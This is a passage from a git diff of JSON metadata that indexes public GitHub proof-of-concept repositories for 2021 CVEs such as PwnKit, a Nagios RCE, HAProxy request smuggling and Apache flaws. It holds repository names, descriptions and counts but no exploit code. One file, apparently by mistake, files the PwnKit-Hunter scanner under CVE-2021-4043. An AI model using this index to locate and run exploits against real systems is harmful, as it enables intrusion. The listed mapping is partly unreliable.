"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592656880, + "name": "CVE-2021-4034", + "full_name": "mutur4\/CVE-2021-4034", + "owner": { + "login": "mutur4", + "id": 68686790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4", + "html_url": "https:\/\/github.com\/mutur4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutur4\/CVE-2021-4034", + "description": "A pwnkit N-Day exploit ", + "fork": false, + "created_at": "2023-01-24T08:29:44Z", + "updated_at": "2024-04-16T12:52:34Z", + "pushed_at": "2024-04-10T14:48:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604329826, + "name": "CVE-2021-4034_Python3", + "full_name": "n3rdh4x0r\/CVE-2021-4034_Python3", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2021-4034_Python3", + "description": null, + "fork": false, + "created_at": "2023-02-20T20:39:32Z", + "updated_at": "2023-02-20T20:40:22Z", + "pushed_at": "2023-02-20T20:40:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653868654, + "name": "CVE-2021-4034", + "full_name": "TheSermux\/CVE-2021-4034", + "owner": { + "login": "TheSermux", + "id": 70709608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70709608?v=4", + "html_url": "https:\/\/github.com\/TheSermux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheSermux\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2023-06-14T23:21:50Z", + "updated_at": "2023-06-14T23:24:18Z", + "pushed_at": "2023-06-14T23:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659471096, + "name": "lab_cve-2021-4034-polkit-emulation-and-detection", + "full_name": "ps-interactive\/lab_cve-2021-4034-polkit-emulation-and-detection", + "owner": { + "login": "ps-interactive", + "id": 35313392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4", + "html_url": "https:\/\/github.com\/ps-interactive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ps-interactive\/lab_cve-2021-4034-polkit-emulation-and-detection", + "description": null, + "fork": false, + "created_at": "2023-06-27T23:06:02Z", + "updated_at": "2024-08-15T15:30:01Z", + "pushed_at": "2024-08-15T15:29:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 664544427, + "name": "CVE-2021-4034", + "full_name": "asepsaepdin\/CVE-2021-4034", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2023-07-10T08:05:17Z", + "updated_at": "2023-07-10T08:05:39Z", + "pushed_at": "2023-07-10T08:57:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672008347, + "name": "CVE-2021-4034-Capture-the-flag", + "full_name": "JohnGilbert57\/CVE-2021-4034-Capture-the-flag", + "owner": { + "login": "JohnGilbert57", + "id": 54565130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54565130?v=4", + "html_url": "https:\/\/github.com\/JohnGilbert57", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnGilbert57\/CVE-2021-4034-Capture-the-flag", + "description": null, + "fork": false, + "created_at": "2023-07-28T17:12:18Z", + "updated_at": "2023-07-28T17:20:18Z", + "pushed_at": "2023-07-28T17:20:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720951897, + "name": "Polkit-Permission-promotion-compiled", + "full_name": "Part01-Pai\/Polkit-Permission-promotion-compiled", + "owner": { + "login": "Part01-Pai", + "id": 45894602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45894602?v=4", + "html_url": "https:\/\/github.com\/Part01-Pai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Part01-Pai\/Polkit-Permission-promotion-compiled", + "description": "Polkit提权包 CVE-2021-4034 (供需要的人方便使用", + "fork": false, + "created_at": "2023-11-20T03:24:05Z", + "updated_at": "2024-04-20T01:15:26Z", + "pushed_at": "2024-04-20T01:15:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738853910, + "name": "CVE-2021-4034-touch", + "full_name": "cdxiaodong\/CVE-2021-4034-touch", + "owner": { + "login": "cdxiaodong", + "id": 84082748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4", + "html_url": "https:\/\/github.com\/cdxiaodong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2021-4034-touch", + "description": "touch 生成文件", + "fork": false, + "created_at": "2024-01-04T07:43:02Z", + "updated_at": "2024-01-04T12:08:40Z", + "pushed_at": "2024-01-04T07:43:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739869108, + "name": "CVE-2021-4034", + "full_name": "LucasPDiniz\/CVE-2021-4034", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-4034", + "description": "Local Privilege Escalation (LPE) vulnerability in Polkit - Pwnkit", + "fork": false, + "created_at": "2024-01-06T19:41:41Z", + "updated_at": "2024-06-30T21:55:56Z", + "pushed_at": "2024-06-30T21:55:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021", + "cve-2021-4034", + "escalate-privilages", + "pwnkit", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 743945734, + "name": "CVE-2021-4034", + "full_name": "Pol-Ruiz\/CVE-2021-4034", + "owner": { + "login": "Pol-Ruiz", + "id": 151052652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4", + "html_url": "https:\/\/github.com\/Pol-Ruiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pol-Ruiz\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2024-01-16T10:18:38Z", + "updated_at": "2024-01-16T10:19:27Z", + "pushed_at": "2024-01-26T13:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744739584, + "name": "CVE-2021-4034", + "full_name": "cerodah\/CVE-2021-4034", + "owner": { + "login": "cerodah", + "id": 82907557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82907557?v=4", + "html_url": "https:\/\/github.com\/cerodah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cerodah\/CVE-2021-4034", + "description": "PoC de Polkit", + "fork": false, + "created_at": "2024-01-17T22:55:46Z", + "updated_at": "2024-09-19T13:21:32Z", + "pushed_at": "2024-01-24T18:11:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749057888, + "name": "PwnKit-CVE-2021-4034", + "full_name": "FancySauce\/PwnKit-CVE-2021-4034", + "owner": { + "login": "FancySauce", + "id": 32100248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32100248?v=4", + "html_url": "https:\/\/github.com\/FancySauce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FancySauce\/PwnKit-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2024-01-27T13:17:50Z", + "updated_at": "2024-01-27T13:29:02Z", + "pushed_at": "2024-03-04T21:59:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752772001, + "name": "CVE-2021-4034-CTF-writeup", + "full_name": "wechicken456\/CVE-2021-4034-CTF-writeup", + "owner": { + "login": "wechicken456", + "id": 55309735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55309735?v=4", + "html_url": "https:\/\/github.com\/wechicken456", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wechicken456\/CVE-2021-4034-CTF-writeup", + "description": null, + "fork": false, + "created_at": "2024-02-04T19:00:38Z", + "updated_at": "2024-11-06T02:19:54Z", + "pushed_at": "2024-05-20T18:33:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788783751, + "name": "CVE-2021-4034", + "full_name": "ASG-CASTLE\/CVE-2021-4034", + "owner": { + "login": "ASG-CASTLE", + "id": 160751832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160751832?v=4", + "html_url": "https:\/\/github.com\/ASG-CASTLE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASG-CASTLE\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2024-04-19T04:33:14Z", + "updated_at": "2024-04-19T04:33:14Z", + "pushed_at": "2024-04-19T04:44:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802783784, + "name": "Exploiting-PwnKit-CVE-2021-4034-", + "full_name": "X-Projetion\/Exploiting-PwnKit-CVE-2021-4034-", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/Exploiting-PwnKit-CVE-2021-4034-", + "description": null, + "fork": false, + "created_at": "2024-05-19T08:58:00Z", + "updated_at": "2024-05-19T09:00:24Z", + "pushed_at": "2024-05-19T09:00:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822469316, + "name": "CVE-2021-4034", + "full_name": "evkl1d\/CVE-2021-4034", + "owner": { + "login": "evkl1d", + "id": 113887123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113887123?v=4", + "html_url": "https:\/\/github.com\/evkl1d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evkl1d\/CVE-2021-4034", + "description": "polkit", + "fork": false, + "created_at": "2024-07-01T08:04:29Z", + "updated_at": "2024-07-01T08:13:02Z", + "pushed_at": "2024-07-01T08:12:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823920292, + "name": "CVE-2021-4034", + "full_name": "Typical0day\/CVE-2021-4034", + "owner": { + "login": "Typical0day", + "id": 174670608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174670608?v=4", + "html_url": "https:\/\/github.com\/Typical0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Typical0day\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2024-07-04T02:33:57Z", + "updated_at": "2024-07-04T02:34:26Z", + "pushed_at": "2024-07-04T02:34:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848038594, + "name": "CVE-2021-4034", + "full_name": "lsclsclsc\/CVE-2021-4034", + "owner": { + "login": "lsclsclsc", + "id": 59271192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59271192?v=4", + "html_url": "https:\/\/github.com\/lsclsclsc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsclsclsc\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2024-08-27T02:39:10Z", + "updated_at": "2024-08-27T02:40:02Z", + "pushed_at": "2024-08-27T02:40:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867632765, + "name": "CVE-2021-4034-PoC", + "full_name": "EuJin03\/CVE-2021-4034-PoC", + "owner": { + "login": "EuJin03", + "id": 73353966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73353966?v=4", + "html_url": "https:\/\/github.com\/EuJin03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EuJin03\/CVE-2021-4034-PoC", + "description": null, + "fork": false, + "created_at": "2024-10-04T12:33:59Z", + "updated_at": "2024-10-04T12:41:57Z", + "pushed_at": "2024-10-04T12:41:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40345.json b/2021/CVE-2021-40345.json new file mode 100644 index 0000000000..bc6b7fe1d0 --- /dev/null +++ b/2021/CVE-2021-40345.json @@ -0,0 +1,33 @@ +[ + { + "id": 373309719, + "name": "NagiosXI-RCE-all-version-CVE-2021-40345", + "full_name": "ArianeBlow\/NagiosXI-RCE-all-version-CVE-2021-40345", + "owner": { + "login": "ArianeBlow", + "id": 61753065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4", + "html_url": "https:\/\/github.com\/ArianeBlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArianeBlow\/NagiosXI-RCE-all-version-CVE-2021-40345", + "description": "RFI to RCE Nagios\/NagiosXI exploitation", + "fork": false, + "created_at": "2021-06-02T21:39:53Z", + "updated_at": "2023-12-05T10:24:02Z", + "pushed_at": "2022-03-03T17:08:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40346.json b/2021/CVE-2021-40346.json new file mode 100644 index 0000000000..14b9a4a81f --- /dev/null +++ b/2021/CVE-2021-40346.json @@ -0,0 +1,157 @@ +[ + { + "id": 404512556, + "name": "CVE-2021-40346", + "full_name": "knqyf263\/CVE-2021-40346", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-40346", + "description": "CVE-2021-40346 PoC (HAProxy HTTP Smuggling)", + "fork": false, + "created_at": "2021-09-08T22:26:19Z", + "updated_at": "2024-10-23T03:16:33Z", + "pushed_at": "2021-09-08T22:37:15Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 39, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 405007433, + "name": "CVE-2021-40346-POC", + "full_name": "donky16\/CVE-2021-40346-POC", + "owner": { + "login": "donky16", + "id": 24637333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24637333?v=4", + "html_url": "https:\/\/github.com\/donky16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/donky16\/CVE-2021-40346-POC", + "description": "CVE-2021-40346 integer overflow enables http smuggling", + "fork": false, + "created_at": "2021-09-10T08:18:20Z", + "updated_at": "2024-08-12T20:16:19Z", + "pushed_at": "2021-09-28T08:28:18Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 405232580, + "name": "CVE-2021-40346", + "full_name": "alikarimi999\/CVE-2021-40346", + "owner": { + "login": "alikarimi999", + "id": 90207127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90207127?v=4", + "html_url": "https:\/\/github.com\/alikarimi999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alikarimi999\/CVE-2021-40346", + "description": null, + "fork": false, + "created_at": "2021-09-10T23:02:45Z", + "updated_at": "2024-08-12T20:16:20Z", + "pushed_at": "2021-09-13T20:46:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 425818031, + "name": "HAProxy_CVE-2021-40346", + "full_name": "Vulnmachines\/HAProxy_CVE-2021-40346", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/HAProxy_CVE-2021-40346", + "description": "HAProxy CVE-2021-40346", + "fork": false, + "created_at": "2021-11-08T11:53:45Z", + "updated_at": "2022-09-21T01:42:54Z", + "pushed_at": "2022-09-20T10:30:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 451651719, + "name": "CVE-2021-40346", + "full_name": "alexOarga\/CVE-2021-40346", + "owner": { + "login": "alexOarga", + "id": 26066039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26066039?v=4", + "html_url": "https:\/\/github.com\/alexOarga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexOarga\/CVE-2021-40346", + "description": "CVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow", + "fork": false, + "created_at": "2022-01-24T22:16:39Z", + "updated_at": "2022-01-24T22:18:20Z", + "pushed_at": "2022-01-24T22:18:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40352.json b/2021/CVE-2021-40352.json new file mode 100644 index 0000000000..a0281a72fa --- /dev/null +++ b/2021/CVE-2021-40352.json @@ -0,0 +1,33 @@ +[ + { + "id": 401973989, + "name": "CVE-2021-40352", + "full_name": "allenenosh\/CVE-2021-40352", + "owner": { + "login": "allenenosh", + "id": 49747518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49747518?v=4", + "html_url": "https:\/\/github.com\/allenenosh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/allenenosh\/CVE-2021-40352", + "description": null, + "fork": false, + "created_at": "2021-09-01T07:39:27Z", + "updated_at": "2021-11-22T11:09:11Z", + "pushed_at": "2021-09-01T09:04:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40353.json b/2021/CVE-2021-40353.json new file mode 100644 index 0000000000..5dc712aa5b --- /dev/null +++ b/2021/CVE-2021-40353.json @@ -0,0 +1,33 @@ +[ + { + "id": 401852393, + "name": "CVE-2021-40353", + "full_name": "5qu1n7\/CVE-2021-40353", + "owner": { + "login": "5qu1n7", + "id": 44474414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44474414?v=4", + "html_url": "https:\/\/github.com\/5qu1n7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5qu1n7\/CVE-2021-40353", + "description": "CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability", + "fork": false, + "created_at": "2021-08-31T21:51:14Z", + "updated_at": "2023-03-22T16:11:23Z", + "pushed_at": "2021-09-03T17:48:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40373.json b/2021/CVE-2021-40373.json new file mode 100644 index 0000000000..0bcbcb0dc1 --- /dev/null +++ b/2021/CVE-2021-40373.json @@ -0,0 +1,33 @@ +[ + { + "id": 401705362, + "name": "CVE-2021-40373", + "full_name": "maikroservice\/CVE-2021-40373", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2021-40373", + "description": "CVE-2021-40373 - remote code execution", + "fork": false, + "created_at": "2021-08-31T13:03:10Z", + "updated_at": "2022-03-24T09:34:07Z", + "pushed_at": "2022-03-24T09:34:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40374.json b/2021/CVE-2021-40374.json new file mode 100644 index 0000000000..9047172d52 --- /dev/null +++ b/2021/CVE-2021-40374.json @@ -0,0 +1,33 @@ +[ + { + "id": 401673817, + "name": "CVE-2021-40374", + "full_name": "DCKento\/CVE-2021-40374", + "owner": { + "login": "DCKento", + "id": 20635370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20635370?v=4", + "html_url": "https:\/\/github.com\/DCKento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DCKento\/CVE-2021-40374", + "description": "Stored Cross-site Scripting in OpenEyes 3.5.1", + "fork": false, + "created_at": "2021-08-31T11:12:49Z", + "updated_at": "2023-08-10T10:40:30Z", + "pushed_at": "2021-10-30T14:48:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40375.json b/2021/CVE-2021-40375.json new file mode 100644 index 0000000000..b23d7fbd32 --- /dev/null +++ b/2021/CVE-2021-40375.json @@ -0,0 +1,33 @@ +[ + { + "id": 401673921, + "name": "CVE-2021-40375", + "full_name": "DCKento\/CVE-2021-40375", + "owner": { + "login": "DCKento", + "id": 20635370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20635370?v=4", + "html_url": "https:\/\/github.com\/DCKento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DCKento\/CVE-2021-40375", + "description": "Broken Access Control in OpenEyes 3.5.1", + "fork": false, + "created_at": "2021-08-31T11:13:14Z", + "updated_at": "2023-08-10T10:39:48Z", + "pushed_at": "2021-10-30T14:49:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4043.json b/2021/CVE-2021-4043.json new file mode 100644 index 0000000000..7aa60ed0d7 --- /dev/null +++ b/2021/CVE-2021-4043.json @@ -0,0 +1,33 @@ +[ + { + "id": 453690906, + "name": "PwnKit-Hunter", + "full_name": "cyberark\/PwnKit-Hunter", + "owner": { + "login": "cyberark", + "id": 30869256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30869256?v=4", + "html_url": "https:\/\/github.com\/cyberark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberark\/PwnKit-Hunter", + "description": "PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit", + "fork": false, + "created_at": "2022-01-30T13:42:16Z", + "updated_at": "2024-10-08T19:08:29Z", + "pushed_at": "2022-02-01T12:18:42Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40438.json b/2021/CVE-2021-40438.json new file mode 100644 index 0000000000..db1e4d200d --- /dev/null +++ b/2021/CVE-2021-40438.json @@ -0,0 +1,296 @@ +[ + { + "id": 418310369, + "name": "CVE-2021-40438", + "full_name": "xiaojiangxl\/CVE-2021-40438", + "owner": { + "login": "xiaojiangxl", + "id": 58814935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58814935?v=4", + "html_url": "https:\/\/github.com\/xiaojiangxl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaojiangxl\/CVE-2021-40438", + "description": null, + "fork": false, + "created_at": "2021-10-18T02:02:43Z", + "updated_at": "2024-07-30T16:14:36Z", + "pushed_at": "2021-10-18T02:42:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420650239, + "name": "CVE-2021-40438", + "full_name": "sixpacksecurity\/CVE-2021-40438", + "owner": { + "login": "sixpacksecurity", + "id": 91971692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91971692?v=4", + "html_url": "https:\/\/github.com\/sixpacksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sixpacksecurity\/CVE-2021-40438", + "description": "CVE-2021-40438 exploit PoC with Docker setup.", + "fork": false, 